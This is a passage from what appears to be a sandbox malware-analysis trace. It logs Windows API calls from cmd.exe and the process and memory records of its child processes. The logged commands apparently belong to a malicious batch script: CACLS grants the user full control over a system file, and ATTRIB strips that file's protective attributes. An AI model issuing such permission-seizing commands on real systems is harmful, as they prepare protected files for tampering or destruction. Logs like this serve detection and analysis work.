lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0147.999] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0147.999] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0147.999] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0147.999] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0147.999] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0147.999] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0147.999] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0147.999] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0147.999] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf820 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0148.000] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf820, lpFilePart=0x1cf81c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf81c*="Desktop") returned 0x18 [0148.000] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0148.000] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf59c | out: lpFindFileData=0x1cf59c) returned 0x290b48 [0148.000] FindClose (in: hFindFile=0x290b48 | out: hFindFile=0x290b48) returned 1 [0148.000] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf59c | out: lpFindFileData=0x1cf59c) returned 0x290b48 [0148.000] FindClose (in: hFindFile=0x290b48 | out: hFindFile=0x290b48) returned 1 [0148.000] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf59c | out: lpFindFileData=0x1cf59c) returned 0x290b48 [0148.000] FindClose (in: hFindFile=0x290b48 | out: hFindFile=0x290b48) returned 1 [0148.000] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0148.000] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0148.001] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0148.001] GetEnvironmentStringsW () returned 0x290368* [0148.001] FreeEnvironmentStringsW (penv=0x290368) returned 1 [0148.001] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0148.001] GetConsoleOutputCP () returned 0x1b5 [0148.038] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0148.038] GetUserDefaultLCID () returned 0x409 [0148.038] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0148.038] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf960, cchData=128 | out: lpLCData="0") returned 2 [0148.038] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf960, cchData=128 | out: lpLCData="0") returned 2 [0148.038] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf960, cchData=128 | out: lpLCData="1") returned 2 [0148.038] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0148.038] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0148.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0148.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0148.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0148.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0148.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0148.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0148.039] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0148.039] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0148.039] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0148.040] GetConsoleTitleW (in: lpConsoleTitle=0x2809f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0148.040] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0148.040] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0148.040] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0148.040] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0148.041] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0148.042] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0148.042] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0148.042] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0148.042] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0148.042] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0148.042] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0148.042] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0148.048] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0148.048] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0148.048] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0148.048] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0148.049] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0148.049] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0148.049] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0148.053] SetErrorMode (uMode=0x0) returned 0x0 [0148.053] SetErrorMode (uMode=0x1) returned 0x0 [0148.053] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x292008, lpFilePart=0x1cf114 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf114*="Desktop") returned 0x18 [0148.053] SetErrorMode (uMode=0x0) returned 0x1 [0148.053] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0148.053] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0148.059] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0148.060] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1cee90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cee90) returned 0xffffffff [0148.060] GetLastError () returned 0x2 [0148.060] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x1cee90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cee90) returned 0xffffffff [0148.060] GetLastError () returned 0x2 [0148.060] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1cee90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cee90) returned 0x280f48 [0148.060] FindClose (in: hFindFile=0x280f48 | out: hFindFile=0x280f48) returned 1 [0148.061] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x1cee90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cee90) returned 0xffffffff [0148.061] GetLastError () returned 0x2 [0148.061] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x1cee90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cee90) returned 0x280f48 [0148.061] FindClose (in: hFindFile=0x280f48 | out: hFindFile=0x280f48) returned 1 [0148.061] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0148.061] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0148.061] GetConsoleTitleW (in: lpConsoleTitle=0x1cf388, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0148.061] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf210, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf2d8 | out: lpAttributeList=0x1cf210, lpSize=0x1cf2d8) returned 1 [0148.061] UpdateProcThreadAttribute (in: lpAttributeList=0x1cf210, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf2d0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cf210, lpPreviousValue=0x0) returned 1 [0148.061] GetStartupInfoW (in: lpStartupInfo=0x1cf1cc | out: lpStartupInfo=0x1cf1cc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0148.061] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0148.062] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1cf26c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf2b8 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x1cf2b8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xb54, dwThreadId=0xba8)) returned 1 [0148.066] CloseHandle (hObject=0x4c) returned 1 [0148.066] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0148.066] GetEnvironmentStringsW () returned 0x2904d8* [0148.066] FreeEnvironmentStringsW (penv=0x2904d8) returned 1 [0148.066] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0148.365] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1cf1ac | out: lpExitCode=0x1cf1ac*=0x0) returned 1 [0148.365] CloseHandle (hObject=0x50) returned 1 [0148.365] _vsnwprintf (in: _Buffer=0x1cf2f4, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cf1b8 | out: _Buffer="00000000") returned 8 [0148.365] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0148.366] GetEnvironmentStringsW () returned 0x2922f0* [0148.366] FreeEnvironmentStringsW (penv=0x2922f0) returned 1 [0148.366] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0148.366] GetEnvironmentStringsW () returned 0x2922f0* [0148.366] FreeEnvironmentStringsW (penv=0x2922f0) returned 1 [0148.366] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cf210 | out: lpAttributeList=0x1cf210) [0148.366] GetConsoleTitleW (in: lpConsoleTitle=0x1cf5f4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0148.366] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0148.366] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0148.366] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0148.367] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1cee90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cee90) returned 0xffffffff [0148.367] GetLastError () returned 0x2 [0148.367] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x1cee90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cee90) returned 0xffffffff [0148.367] GetLastError () returned 0x2 [0148.367] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1cee90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cee90) returned 0x280f48 [0148.367] FindClose (in: hFindFile=0x280f48 | out: hFindFile=0x280f48) returned 1 [0148.367] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1cee90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cee90) returned 0xffffffff [0148.367] GetLastError () returned 0x2 [0148.368] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1cee90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cee90) returned 0x280f48 [0148.368] FindClose (in: hFindFile=0x280f48 | out: hFindFile=0x280f48) returned 1 [0148.368] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0148.368] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0148.368] GetConsoleTitleW (in: lpConsoleTitle=0x1cf388, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0148.368] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf210, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf2d8 | out: lpAttributeList=0x1cf210, lpSize=0x1cf2d8) returned 1 [0148.368] UpdateProcThreadAttribute (in: lpAttributeList=0x1cf210, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf2d0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cf210, lpPreviousValue=0x0) returned 1 [0148.368] GetStartupInfoW (in: lpStartupInfo=0x1cf1cc | out: lpStartupInfo=0x1cf1cc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0148.368] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0148.368] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1cf26c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf2b8 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\"", lpProcessInformation=0x1cf2b8*(hProcess=0x4c, hThread=0x50, dwProcessId=0xacc, dwThreadId=0xa4c)) returned 1 [0148.370] CloseHandle (hObject=0x50) returned 1 [0148.370] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0148.370] GetEnvironmentStringsW () returned 0x292450* [0148.370] FreeEnvironmentStringsW (penv=0x292450) returned 1 [0148.370] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0148.437] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x1cf1ac | out: lpExitCode=0x1cf1ac*=0x0) returned 1 [0148.437] CloseHandle (hObject=0x4c) returned 1 [0148.438] _vsnwprintf (in: _Buffer=0x1cf2f4, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cf1b8 | out: _Buffer="00000000") returned 8 [0148.438] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0148.438] GetEnvironmentStringsW () returned 0x292450* [0148.438] FreeEnvironmentStringsW (penv=0x292450) returned 1 [0148.438] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0148.438] GetEnvironmentStringsW () returned 0x292450* [0148.438] FreeEnvironmentStringsW (penv=0x292450) returned 1 [0148.438] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cf210 | out: lpAttributeList=0x1cf210) [0148.438] _get_osfhandle (_FileHandle=1) returned 0x7 [0148.438] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0148.438] _get_osfhandle (_FileHandle=1) returned 0x7 [0148.438] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0148.439] _get_osfhandle (_FileHandle=0) returned 0x3 [0148.439] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0148.439] SetConsoleInputExeNameW () returned 0x1 [0148.439] GetConsoleOutputCP () returned 0x1b5 [0148.439] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0148.439] SetThreadUILanguage (LangId=0x0) returned 0x409 [0148.439] exit (_Code=0) Process: id = "219" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea167e0" os_pid = "0xb54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "218" os_parent_pid = "0xa3c" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18626 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18627 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18628 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18629 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 18630 start_va = 0x4f0000 end_va = 0x4f8fff entry_point = 0x4f0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 18631 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18632 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18633 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18634 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 18635 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18636 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18637 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18638 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18639 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 18640 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 18641 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18642 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 18643 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18644 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 18645 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18646 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 18647 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 277 os_tid = 0xba8 Thread: id = 278 os_tid = 0xad4 Process: id = "220" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea167e0" os_pid = "0xacc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "218" os_parent_pid = "0xa3c" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18727 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18728 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18729 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18730 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 18731 start_va = 0x5c0000 end_va = 0x5c6fff entry_point = 0x5c0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 18732 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18733 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18734 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18735 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 18736 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18737 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18738 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18739 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18740 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 18741 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 18742 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = 